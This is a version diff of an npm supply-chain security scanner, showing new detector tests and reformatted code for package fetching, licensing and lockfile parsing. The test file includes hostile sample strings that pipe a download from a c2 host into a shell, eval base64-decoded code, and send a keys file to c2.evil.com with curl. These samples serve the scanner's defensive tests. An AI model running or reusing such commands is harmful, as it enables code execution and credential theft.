@lateos/npm-scan 0.18.3 → 1.1.0

package/backend/detectors.test.js

@@ -0,0 +1,147 @@
+import { test } from 'node:test';
+import assert from 'assert/strict';
+import * as detectors from './detectors/index.js';
+
+test('detectors runAll empty', async () => {
+  const findings = await detectors.runAll({});
+  assert.equal(findings.length, 0);
+});
+
+test('ATK-001 detects preinstall', async () => {
+  const pkg = { scripts: { preinstall: 'curl http://c2.example.com/x.sh | sh' } };
+  const findings = await detectors.runAll(pkg);
+  assert(
+    findings.some((f) => f.id === 'ATK-001'),
+    'Expected ATK-001'
+  );
+});
+
+test('ATK-002 detects eval+decode', async () => {
+  const files = [{ path: 'i.js', content: 'eval(atob("Y3VybCBodHRwOi8vYzIuZXZpbC5jb20="))' }];
+  const findings = await detectors.runAll({}, files);
+  assert(
+    findings.some((f) => f.id === 'ATK-002'),
+    'Expected ATK-002'
+  );
+});
+
+test('ATK-003 detects cred env vars', async () => {
+  const files = [{ path: 'i.js', content: 'console.log(process.env.NPM_TOKEN)' }];
+  const findings = await detectors.runAll({}, files);
+  assert(
+    findings.some((f) => f.id === 'ATK-003'),
+    'Expected ATK-003'
+  );
+});
+
+test('ATK-004 detects editor persistence', async () => {
+  const files = [{ path: 'i.js', content: 'fs.mkdirSync(".vscode")' }];
+  const findings = await detectors.runAll({}, files);
+  assert(
+    findings.some((f) => f.id === 'ATK-004'),
+    'Expected ATK-004'
+  );
+});
+
+test('ATK-005 detects network exfil', async () => {
+  const files = [{ path: 'i.js', content: 'curl --data-binary @keys http://c2.evil.com' }];
+  const findings = await detectors.runAll({}, files);
+  assert(
+    findings.some((f) => f.id === 'ATK-005'),
+    'Expected ATK-005'
+  );
+});
+
+test('ATK-006 detects dep confusion', async () => {
+  const pkg = { dependencies: { 'acorn-squatter': '1.0.0' } };
+  const findings = await detectors.runAll(pkg);
+  assert(
+    findings.some((f) => f.id === 'ATK-006'),
+    'Expected ATK-006'
+  );
+});
+
+test('ATK-007 detects typosquatting', async () => {
+  const pkg = { dependencies: { lodash: 'latest', loddsh: '1.0.0' } };
+  const findings = await detectors.runAll(pkg);
+  assert(
+    findings.some((f) => f.id === 'ATK-007'),
+    'Expected ATK-007 for loddsh'
+  );
+});
+
+test('ATK-008 detects tarball tampering', async () => {
+  const pkg = {
+    name: 'lodash',
+    repository: { url: 'https://github.com/attacker/lodash-evil.git' },
+  };
+  const findings = await detectors.runAll(pkg);
+  assert(
+    findings.some((f) => f.id === 'ATK-008'),
+    'Expected ATK-008'
+  );
+});
+
+test('ATK-009 detects CI env trigger', async () => {
+  const files = [{ path: 'i.js', content: 'if (process.env.CI) { eval(atob("ZXZpbA==")) }' }];
+  const findings = await detectors.runAll({}, files);
+  assert(
+    findings.some((f) => f.id === 'ATK-009'),
+    'Expected ATK-009'
+  );
+});
+
+test('ATK-010 detects sandbox evasion', async () => {
+  const files = [
+    { path: 'i.js', content: 'if (os.hostname().includes("sandbox")) { process.exit(0) }' },
+  ];
+  const findings = await detectors.runAll({}, files);
+  assert(
+    findings.some((f) => f.id === 'ATK-010'),
+    'Expected ATK-010'
+  );
+});
+
+test('ATK-011 detects transitive propagation', async () => {
+  const files = [{ path: 'i.js', content: 'exec("npm install ./malicious-pkg")' }];
+  const findings = await detectors.runAll({}, files);
+  assert(
+    findings.some((f) => f.id === 'ATK-011'),
+    'Expected ATK-011'
+  );
+});
+
+test('no false positives on clean package', async () => {
+  const pkg = {
+    name: 'test-pkg',
+    version: '1.0.0',
+    scripts: { test: 'node test.js' },
+    dependencies: { express: '4.0.0' },
+  };
+  const files = [{ path: 'index.js', content: 'module.exports = function() { return 42 }' }];
+  const findings = await detectors.runAll(pkg, files);
+  const highCrit = findings.filter((f) => f.severity === 'high' || f.severity === 'critical');
+  assert.equal(
+    highCrit.length,
+    0,
+    `Expected no high/crit findings on clean pkg: ${JSON.stringify(highCrit)}`
+  );
+});
+
+test('all 11 ATK IDs present', async () => {
+  const _expected = [
+    'ATK-001',
+    'ATK-002',
+    'ATK-003',
+    'ATK-004',
+    'ATK-005',
+    'ATK-006',
+    'ATK-007',
+    'ATK-008',
+    'ATK-009',
+    'ATK-010',
+    'ATK-011',
+  ];
+  const exports = Object.keys(detectors);
+  assert.equal(exports.includes('runAll'), true);
+});

package/backend/fetch.js

@@ -9,19 +9,23 @@ import { pipeline } from 'stream/promises';
 export async function fetchPackage(target, options = {}) {
   const { cacheDir, cacheTTL = 604800, cacheMaxSize = 1000000000 } = options;
   let name, version;
-  
+
   if (target.startsWith('@')) {
     const lastAt = target.lastIndexOf('@');
     name = target.slice(0, lastAt);
     version = target.slice(lastAt + 1);
-    if (!version) version = undefined;
+    if (!version) {
+      version = undefined;
+    }
   } else {
     const idx = target.indexOf('@');
     name = idx > -1 ? target.slice(0, idx) : target;
     version = idx > -1 ? target.slice(idx + 1) : undefined;
   }
-  
-  const endpoint = version ? `/${encodeURIComponent(name)}/${version}` : `/${encodeURIComponent(name)}/latest`;
+
+  const endpoint = version
+    ? `/${encodeURIComponent(name)}/${version}`
+    : `/${encodeURIComponent(name)}/latest`;
 
   if (cacheDir) {
     const cached = getFromCache(cacheDir, target, cacheTTL);
@@ -41,7 +45,9 @@ export async function fetchPackage(target, options = {}) {
   const tarUrl = meta.dist.tarball;
   const tarRes = await fetch(tarUrl);
   const buffer = Buffer.from(await tarRes.arrayBuffer());
-  if (buffer.length > 500 * 1024 * 1024) throw new Error('Tarball too large');
+  if (buffer.length > 500 * 1024 * 1024) {
+    throw new Error('Tarball too large');
+  }
 
   // Save to cache if enabled
   if (cacheDir) {
@@ -55,19 +61,21 @@ export async function fetchPackage(target, options = {}) {
 function getFromCache(cacheDir, target, ttl) {
   const cachePath = path.join(cacheDir, `${target.replace('/', '-')}.tgz`);
   const metaPath = path.join(cacheDir, `${target.replace('/', '-')}.meta.json`);
-  
+
   try {
-    if (!fs.existsSync(cachePath) || !fs.existsSync(metaPath)) return null;
-    
+    if (!fs.existsSync(cachePath) || !fs.existsSync(metaPath)) {
+      return null;
+    }
+
     const meta = JSON.parse(fs.readFileSync(metaPath, 'utf8'));
     const age = (Date.now() - meta.timestamp) / 1000;
-    
+
     if (age > ttl) {
       fs.unlinkSync(cachePath);
       fs.unlinkSync(metaPath);
       return null;
     }
-    
+
     return fs.readFileSync(cachePath);
   } catch {
     return null;
@@ -79,27 +87,27 @@ function saveToCache(cacheDir, target, buffer, ttl, maxSize) {
     if (!fs.existsSync(cacheDir)) {
       fs.mkdirSync(cacheDir, { recursive: true });
     }
-    
+
     // Prune if needed
     pruneCache(cacheDir, maxSize);
-    
+
     const safeName = target.replace('/', '-');
     const cachePath = path.join(cacheDir, `${safeName}.tgz`);
     const metaPath = path.join(cacheDir, `${safeName}.meta.json`);
-    
+
     fs.writeFileSync(cachePath, buffer);
     fs.writeFileSync(metaPath, JSON.stringify({ timestamp: Date.now(), size: buffer.length }));
-  } catch (e) {
+  } catch {
     // Cache write failure - continue without caching
   }
 }
 
 function pruneCache(cacheDir, maxSize) {
   try {
-    const files = fs.readdirSync(cacheDir).filter(f => f.endsWith('.meta.json'));
+    const files = fs.readdirSync(cacheDir).filter((f) => f.endsWith('.meta.json'));
     let totalSize = 0;
     const fileInfos = [];
-    
+
     for (const f of files) {
       const meta = JSON.parse(fs.readFileSync(path.join(cacheDir, f), 'utf8'));
       const tarFile = f.replace('.meta.json', '.tgz');
@@ -107,17 +115,21 @@ function pruneCache(cacheDir, maxSize) {
       totalSize += size;
       fileInfos.push({ tarFile, metaFile: f, timestamp: meta.timestamp, size });
     }
-    
+
     if (totalSize > maxSize) {
       // Sort by oldest first and remove until under limit
       fileInfos.sort((a, b) => a.timestamp - b.timestamp);
       for (const info of fileInfos) {
-        if (totalSize <= maxSize * 0.8) break; // Leave 20% margin
+        if (totalSize <= maxSize * 0.8) {
+          break;
+        } // Leave 20% margin
         try {
           fs.unlinkSync(path.join(cacheDir, info.tarFile));
           fs.unlinkSync(path.join(cacheDir, info.metaFile));
           totalSize -= info.size;
-        } catch {}
+        } catch {
+          /* ignore file errors */
+        }
       }
     }
   } catch {
@@ -135,24 +147,20 @@ async function extractTarball(buffer, tmpDir) {
   fs.mkdirSync(tmpDir, { recursive: true });
 
   const stream = Readable.from(buffer);
-  await pipeline(
-    stream,
-    zlib.createGunzip(),
-    extract({ cwd: tmpDir, strip: 1 })
-  );
+  await pipeline(stream, zlib.createGunzip(), extract({ cwd: tmpDir, strip: 1 }));
 
   const pkgPath = path.join(tmpDir, 'package.json');
   const pkgJsonStr = fs.readFileSync(pkgPath, 'utf8');
   const pkgJson = JSON.parse(pkgJsonStr);
 
-  const jsFiles = walkFiles(tmpDir, '.js').map(p => ({
+  const jsFiles = walkFiles(tmpDir, '.js').map((p) => ({
     path: p,
-    content: fs.readFileSync(p, 'utf8')
+    content: fs.readFileSync(p, 'utf8'),
   }));
 
-  const allFiles = walkFiles(tmpDir, '').map(p => ({
+  const allFiles = walkFiles(tmpDir, '').map((p) => ({
     path: p,
-    content: fs.readFileSync(p, 'utf8')
+    content: fs.readFileSync(p, 'utf8'),
   }));
 
   return { pkgJson, jsFiles, allFiles, tmpDir };
@@ -173,4 +181,4 @@ function walkFiles(dir, ext) {
 
 export function cleanup(tmpDir) {
   fs.rmSync(tmpDir, { recursive: true, force: true });
-}
+}

package/backend/index.js

@@ -1,4 +1,4 @@
 export default {
   version: '0.1.0',
-  description: 'npm-scan - Supply chain security for npm'
+  description: 'npm-scan - Supply chain security for npm',
 };

package/backend/license.js

@@ -5,7 +5,19 @@ const HMAC_KEY = process.env.NPM_SCAN_LICENSE_SECRET || 'npm-scan-default-dev-ke
 const FEATURE_TIERS = {
   community: [],
   premium: ['sandbox', 'siem', 'cra', 'nist-pdf', 'rest-api', 'webhooks', 'helm'],
-  enterprise: ['sandbox', 'siem', 'cra', 'nist-pdf', 'rest-api', 'webhooks', 'helm', 'sso', 'audit-logs', 'pg-backend', 'kubernetes'],
+  enterprise: [
+    'sandbox',
+    'siem',
+    'cra',
+    'nist-pdf',
+    'rest-api',
+    'webhooks',
+    'helm',
+    'sso',
+    'audit-logs',
+    'pg-backend',
+    'kubernetes',
+  ],
 };
 
 const ALL_FEATURES = Object.values(FEATURE_TIERS).flat();
@@ -70,7 +82,9 @@ export function validateLicense(key, feature = '*') {
   }
 
   if (feature !== '*' && !allowed.includes(feature) && !ALLOWED_UNLOCKED.includes(feature)) {
-    throw new Error(`Feature "${feature}" requires ${edition === 'community' ? 'premium' : 'enterprise'} license`);
+    throw new Error(
+      `Feature "${feature}" requires ${edition === 'community' ? 'premium' : 'enterprise'} license`
+    );
   }
 
   return { edition, features: allowed, ...payload };
@@ -80,11 +94,13 @@ export function isFeatureEnabled(feature, licenseKey = process.env.NPM_SCAN_LICE
   try {
     if (!licenseKey) {
       const unlocked = feature === 'scan' || ALLOWED_UNLOCKED.includes(feature);
-      if (unlocked) return true;
+      if (unlocked) {
+        return true;
+      }
     }
     validateLicense(licenseKey, feature);
     return true;
   } catch {
     return false;
   }
-}
+}

package/backend/lockfile.js

@@ -1,5 +1,5 @@
 import { readFileSync } from 'fs';
-import { resolve, dirname } from 'path';
+import { resolve as _resolve, dirname as _dirname } from 'path';
 import yaml from 'js-yaml';
 
 export function parseLockfile(filePath, options = {}) {
@@ -32,17 +32,19 @@ export function parseLockfile(filePath, options = {}) {
 
     return parseNpmLockfile(content, filePath);
   } catch (e) {
-    throw new Error(`Failed to parse lockfile: ${e.message}`);
+    throw new Error(`Failed to parse lockfile: ${e.message}`, { cause: e });
   }
 }
 
-function parseNpmLockfile(content, filePath) {
+function parseNpmLockfile(content, _filePath) {
   const lockfile = JSON.parse(content);
   const packages = [];
 
   if (lockfile.packages) {
     for (const [key, pkg] of Object.entries(lockfile.packages)) {
-      if (key === '') continue;
+      if (key === '') {
+        continue;
+      }
       const name = pkg.name || key.replace(/^node_modules\//, '').replace(/^[^/]+\//, '');
       packages.push({
         name,
@@ -54,7 +56,7 @@ function parseNpmLockfile(content, filePath) {
         dev: pkg.dev || false,
         optional: pkg.optional || false,
         scripts: pkg.scripts || {},
-        dependencies: pkg.dependencies || {}
+        dependencies: pkg.dependencies || {},
       });
     }
   }
@@ -68,22 +70,23 @@ function parseNpmLockfile(content, filePath) {
       version: rootDeps.version || 'unknown',
       dependencies: rootDeps.dependencies || {},
       devDependencies: rootDeps.devDependencies || {},
-      peerDependencies: rootDeps.peerDependencies || {}
-    }
+      peerDependencies: rootDeps.peerDependencies || {},
+    },
   };
 }
 
-function parseYarnLockfile(content, filePath) {
+function parseYarnLockfile(content, _filePath) {
   const packages = [];
   const lines = content.split('\n');
   let i = 0;
   const n = lines.length;
 
-  const MULTI_ENTRY_RE = /^"?([\w@./-]+)@(\^?[\w.+\-~]+)"?\s*,\s*"?([\w@./-]+)@(\^?[\w.+\-~]+)"?\s*:\s*$/;
+  const MULTI_ENTRY_RE =
+    /^"?([\w@./-]+)@(\^?[\w.+\-~]+)"?\s*,\s*"?([\w@./-]+)@(\^?[\w.+\-~]+)"?\s*:\s*$/;
   const SINGLE_ENTRY_RE = /^"?([\w@./-]+)@(\^?[\w.+\-~]+)"?\s*:\s*$/;
 
   while (i < n) {
-    let line = lines[i].trimEnd();
+    const line = lines[i].trimEnd();
 
     let specs = [];
 
@@ -93,7 +96,7 @@ function parseYarnLockfile(content, filePath) {
     if (multiMatch) {
       specs = [
         { name: multiMatch[1], specVersion: multiMatch[2] },
-        { name: multiMatch[3], specVersion: multiMatch[4] }
+        { name: multiMatch[3], specVersion: multiMatch[4] },
       ];
     } else if (singleMatch) {
       specs = [{ name: singleMatch[1], specVersion: singleMatch[2] }];
@@ -125,26 +128,37 @@ function parseYarnLockfile(content, filePath) {
 
         if (bodyTrim.startsWith('version ')) {
           const vMatch = bodyTrim.match(/^version ['"]([^'"]+)['"]/);
-          if (vMatch) version = vMatch[1];
+          if (vMatch) {
+            version = vMatch[1];
+          }
         } else if (bodyTrim.match(/^\s*resolved\s+(.+)/)) {
           const rMatch = bodyTrim.match(/^\s*resolved\s+(.+)/);
           if (rMatch) {
             resolved = rMatch[1].trim().replace(/^['"]|['"]$/g, '');
             if (resolved.startsWith('https://registry.yarnpkg.com/')) {
-              resolved = resolved.replace('https://registry.yarnpkg.com/', 'https://registry.npmjs.org/');
+              resolved = resolved.replace(
+                'https://registry.yarnpkg.com/',
+                'https://registry.npmjs.org/'
+              );
             }
           }
         } else if (bodyTrim.startsWith('integrity ')) {
           integrity = bodyTrim.replace('integrity ', '').trim();
         } else if (bodyTrim.startsWith('dependencies')) {
           const m = bodyTrim.match(/^dependencies\s+(.*)/);
-          if (m) parseDepList(m[1], dependencies);
+          if (m) {
+            parseDepList(m[1], dependencies);
+          }
         } else if (bodyTrim.startsWith('optionalDependencies')) {
           const m = bodyTrim.match(/^optionalDependencies\s+(.*)/);
-          if (m) parseDepList(m[1], optionalDependencies);
+          if (m) {
+            parseDepList(m[1], optionalDependencies);
+          }
         } else if (bodyTrim.startsWith('peerDependencies')) {
           const m = bodyTrim.match(/^peerDependencies\s+(.*)/);
-          if (m) parseDepList(m[1], peerDependencies);
+          if (m) {
+            parseDepList(m[1], peerDependencies);
+          }
         } else if (bodyTrim.match(/^\s*dev\s+(true|false)$/)) {
           dev = bodyTrim.includes('true');
         } else if (bodyTrim.match(/^\s*optional\s+(true|false)$/)) {
@@ -166,7 +180,7 @@ function parseYarnLockfile(content, filePath) {
           optional,
           scripts: {},
           dependencies,
-          optionalDependencies
+          optionalDependencies,
         });
       }
     } else {
@@ -192,14 +206,16 @@ function parseYarnLockfile(content, filePath) {
       version: 'unknown',
       dependencies: rootDeps,
       devDependencies: rootDevDeps,
-      peerDependencies: {}
-    }
+      peerDependencies: {},
+    },
   };
 }
 
 function parseDepList(str, dest) {
   const cleaned = str.replace(/^[[\]]/g, '').trim();
-  if (!cleaned) return;
+  if (!cleaned) {
+    return;
+  }
   const re = /([\w@./-]+)\s+\^?([\w@./-]+)/g;
   let m;
   while ((m = re.exec(cleaned)) !== null) {
@@ -207,14 +223,16 @@ function parseDepList(str, dest) {
   }
 }
 
-function parsePnpmLockfile(content, filePath) {
+function parsePnpmLockfile(content, _filePath) {
   const lockfile = yaml.load(content);
   const packages = [];
 
   if (lockfile.packages) {
     for (const [key, pkg] of Object.entries(lockfile.packages)) {
       const nameMatch = key.match(/^\/(.+?)@([^@/]+)$/);
-      if (!nameMatch) continue;
+      if (!nameMatch) {
+        continue;
+      }
       const name = nameMatch[1];
       const version = nameMatch[2];
 
@@ -237,7 +255,7 @@ function parsePnpmLockfile(content, filePath) {
         optional: pkg.optional || false,
         scripts: pkg.hasBundledMedia ? { bundled: true } : {},
         dependencies: pkg.dependencies || {},
-        optionalDependencies: pkg.optionalDependencies || {}
+        optionalDependencies: pkg.optionalDependencies || {},
       });
     }
   }
@@ -257,8 +275,8 @@ function parsePnpmLockfile(content, filePath) {
       version: lockfile.lockfileVersion ? 'unknown' : 'unknown',
       dependencies: rootDepsMap,
       devDependencies: rootDevDepsMap,
-      peerDependencies: rootPeerDepsMap
-    }
+      peerDependencies: rootPeerDepsMap,
+    },
   };
 }
 
@@ -282,7 +300,7 @@ export function checkMaliciousPatterns(pkg) {
         severity: 'high',
         title: 'Typosquat detected',
         description: `Package name "${pkg.name}" is similar to popular packages`,
-        evidence: `similar to ${pattern.source}`
+        evidence: `similar to ${pattern.source}`,
       });
     }
   }
@@ -307,21 +325,25 @@ export function analyzeDependencyGraph(lockfileData) {
             severity: 'high',
             title: 'Transitive propagation (worm)',
             description: `Package "${pkg.name}" depends on peer "${peerName}@${peerVersion}" - potential worm propagation chain`,
-            evidence: `peer dep chain: ${pkg.name} -> ${peerName}`
+            evidence: `peer dep chain: ${pkg.name} -> ${peerName}`,
           });
         }
       }
     }
 
-    if (pkg.dependencies && typeof pkg.dependencies === 'object' && Object.keys(pkg.dependencies).length > 5) {
-      const transitiveCount = Object.keys(pkg.dependencies).filter(k => k.includes('/')).length;
+    if (
+      pkg.dependencies &&
+      typeof pkg.dependencies === 'object' &&
+      Object.keys(pkg.dependencies).length > 5
+    ) {
+      const transitiveCount = Object.keys(pkg.dependencies).filter((k) => k.includes('/')).length;
       if (transitiveCount > 3) {
         findings.push({
           id: 'ATK-011',
           severity: 'medium',
           title: 'Transitive propagation (worm)',
           description: `Package "${pkg.name}" has excessive transitive dependencies (${transitiveCount} scoped)`,
-          evidence: `heavy transitive dep chain: ${pkg.name}`
+          evidence: `heavy transitive dep chain: ${pkg.name}`,
         });
       }
     }
@@ -332,7 +354,7 @@ export function analyzeDependencyGraph(lockfileData) {
         severity: 'low',
         title: 'Transitive propagation (worm)',
         description: `Package "${pkg.name}" has excessive optional dependencies (${Object.keys(pkg.optionalDependencies).length})`,
-        evidence: `optional dep chain: ${pkg.name} -> [${Object.keys(pkg.optionalDependencies).slice(0, 3).join(', ')}, ...]`
+        evidence: `optional dep chain: ${pkg.name} -> [${Object.keys(pkg.optionalDependencies).slice(0, 3).join(', ')}, ...]`,
       });
     }
   }
@@ -342,8 +364,8 @@ export function analyzeDependencyGraph(lockfileData) {
 
 export function generateLockfileReport(lockfileData) {
   const total = lockfileData.packages.length;
-  const dev = lockfileData.packages.filter(p => p.dev).length;
-  const optional = lockfileData.packages.filter(p => p.optional).length;
+  const dev = lockfileData.packages.filter((p) => p.dev).length;
+  const optional = lockfileData.packages.filter((p) => p.optional).length;
 
   const findings = [];
 
@@ -363,12 +385,14 @@ export function generateLockfileReport(lockfileData) {
     optionalDependencies: optional,
     lockfileVersion: lockfileData.version,
     findings,
-    riskScore: calculateRiskScore(findings)
+    riskScore: calculateRiskScore(findings),
   };
 }
 
 function calculateRiskScore(findings) {
-  if (!findings.length) return '0.0';
+  if (!findings.length) {
+    return '0.0';
+  }
   const weights = { critical: 10, high: 7, medium: 4, low: 2, info: 0.5 };
   const maxSeverity = findings.reduce((max, f) => {
     const w = weights[f.severity] || 0;
@@ -377,4 +401,4 @@ function calculateRiskScore(findings) {
   const countBonus = Math.min(findings.length * 0.3, 3);
   const score = Math.min(maxSeverity + countBonus, 10);
   return score.toFixed(1);
-}
+}